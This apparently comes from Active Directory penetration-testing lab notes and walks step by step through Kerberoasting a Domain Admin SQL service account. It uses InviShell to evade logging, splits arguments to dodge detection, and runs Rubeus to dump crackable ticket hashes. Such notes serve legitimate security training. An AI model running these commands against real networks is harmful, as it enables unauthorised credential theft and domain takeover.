Using the Kerberoast attack, crack password of a SQL server service account.
Since the services running with user accounts have easier passwords to crack than machine accounts, let's find them:
# Run InviShell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
# Run PowerView
PS C:\AD\Tools>. C:\AD\Tools\PowerView.ps1
# Get Service Accounts
PS C:\AD\Tools> Get-DomainUser -SPN
A service account called "svcadmin" is a Domain Admin and has a SPN set. We can Kerberoast it.
# ArgSplit "kerberoast"
cd C:\AD\Tools
ArgSplit.bat
set "z=t"
set "y=s"
set "x=a"
set "w=o"
set "v=r"
set "u=e"
set "t=b"
set "s=r"
set "r=e"
set "q=k"
set "Pwn=%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"
# Run Rubeus to Kerberoast
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:svcadmin /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt
The saved hash file needs to be modified to be cracked. Ensure you remote ":1433" from the hash file.